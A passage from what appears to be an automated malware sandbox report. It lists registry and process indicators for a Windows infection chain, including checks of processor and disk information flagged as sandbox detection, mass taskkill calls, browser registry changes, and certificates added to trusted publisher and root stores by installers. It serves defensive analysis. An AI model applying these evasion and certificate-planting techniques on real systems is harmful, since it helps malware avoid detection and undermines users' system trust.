description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID tapinstall.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 B471.tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString B471.tmp.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 GO7uHb4oo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString GO7uHb4oo.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 1632 timeout.exe 6272 timeout.exe 16196 timeout.exe 14256 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 10 IoCs
pid Process 10796 taskkill.exe 12224 taskkill.exe 13916 taskkill.exe 4272 taskkill.exe 11228 taskkill.exe 1348 taskkill.exe 4788 taskkill.exe 10956 taskkill.exe 16212 taskkill.exe 5060 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 13 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{XLCMX7L3-L6I1-MY60-TLXW-JIZNXKAMXM51}\1 = "5212" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1" Process not Found Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "pli10u4" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000389c43a81aaa82d1f6cd1e3f6d816ed6780e835b4d63eae8d770b5b10f24816f7b76376cf53c5b1949b41f1a10e94de6f776ec16334a8d83695b12d084842c4afff426330de069d6c369056a7bea542e2114983aae923245d722d4a7534e4f82d23882135635ff3dcb0b692425249b09540660fdc7dba5ac6ee7ee5779202ee15861d149bbda91e492ba464d0d375ecb9c6dd2c1efc5cc809fc8b4bc869bd941218fa4db2d719dd0e196a5b4c3c20762d769752652f158a74de762e10d60194cdfe13f8e2699f69b95bf94a8bb67d28f6d1b665f79fd99122b63cd3e800dd9a781792329f1f170a6e855aa4280c52fb035a1dae5678a6aba8e5bd7cc1944a9d078768c0c5b1bde59b2781badd97c850dcc1c0471b538b8a539f164e4f6a341736ef811146ab61579dd483b92f62c09cb69ada547c4a7e206ff4333ec8acb5a5c371f02cd96615889b1e5cbef1c7515572f72f4d58b77f46454738bdd225d06f6f60a37f91cbe703b876f78c41ef71774f18cbc9e6249d8d6dc9fc792cbf78859ebdb6a648e6b43f5b10657853052d6cede1b677821bbeb4d678dcbdd625ca4df58da9e23906e MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings guihuali-game.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 1595e3386628d701 Process not Found Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{MKUSM4Y3-Y0K1-VV65-WWVU-TITVMNYKUV21} rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{JAGSC2K0-K4Q1-LO31-YATQ-QCFVCPKLJD69} svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = e0bbc5136628d701 Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{JAGSC2K0-K4Q1-LO31-YATQ-QCFVCPKLJD69} svchost.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 Process not Found Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{PEDLD6H3-W1C2-AP31-WRJR-WMIDOHREDO13}\1 = "2204" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0674c9ff6528d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage MicrosoftEdge.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d